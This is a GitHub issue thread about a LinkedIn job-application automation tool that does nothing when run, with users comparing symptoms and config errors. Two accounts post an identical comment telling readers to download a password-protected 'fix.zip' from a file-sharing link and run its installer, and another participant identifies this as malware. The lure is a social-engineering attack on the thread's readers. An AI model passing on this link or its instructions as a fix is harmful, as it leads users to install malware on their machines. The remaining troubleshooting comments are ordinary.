### ISSUE TITLE
I ran the program and... nothing happened

### ISSUE THREAD

**Issue by BovineOverlord** [feder-cr/linkedIn_auto_jobs_applier_with_AI#78]
I followed the instructions, went on to run python main.py --resume (resume path), it executed on powershell without issue. But nothing happened from there. The API was not used, Linkedin is not showing any resumes sent out. There are no logs so I cannot see what is wrong. Is there a debug mode where I can see the logs of what is occurring as it happens?

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by feder-cr** [comment]
Windows?

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BovineOverlord** [comment]
Yes, powershell and command prompt are Windows.

**Comment by BovineOverlord** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Need some context here- what does this accomplish?

**Comment by feder-cr** [comment]
what is this?

**Comment by david-allison** [comment]
> > Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."
> 
> Need some context here- what does this accomplish?

malware

**Comment by BovineOverlord** [comment]
> what is this?

Can we return to the issue at hand? I'd like to get this working

**Comment by azjz92** [comment]
same for me, absolutely nothing happens in terminal with my resume pathname, and if i just run python main.py i get Configuration error: Invalid type for key 'remote' in config file data_folder\config.yaml. Expected <class 'bool'>.

**Comment by soykot2910** [comment]
Same issue I am using mac.

**Comment by Orlov-AK** [comment]
Same for me, I run through the command line and nothing happens, I don't know if it is related to the fact that I have no credits on my OpenAI account, or maybe the OpenAI key is not working well.

C:\Users\*****\Desktop\LinkedIn_AIHawk_automatic_job_application>python main.py
C:\Users\*****\Desktop\LinkedIn_AIHawk_automatic_job_application>

**Comment by Saarthakkj** [comment]
If this is the error : Expected <class 'bool'>. then you have not changed config file as per your requirements. But I am still facing the issue that it does nothing when i try to run main.py file

**Comment by Faraz643** [comment]
> so I managed to fix it, i did a clean install with setting up a venv then running requirements txt, then I put my resume in the data folder, and to test I just put all the data folder example files into my data folder and replaced what was there, not sure what fixed it specifically tho

While Copying files from data_folder_example to data_folder, did you wrote your original information in the text files?
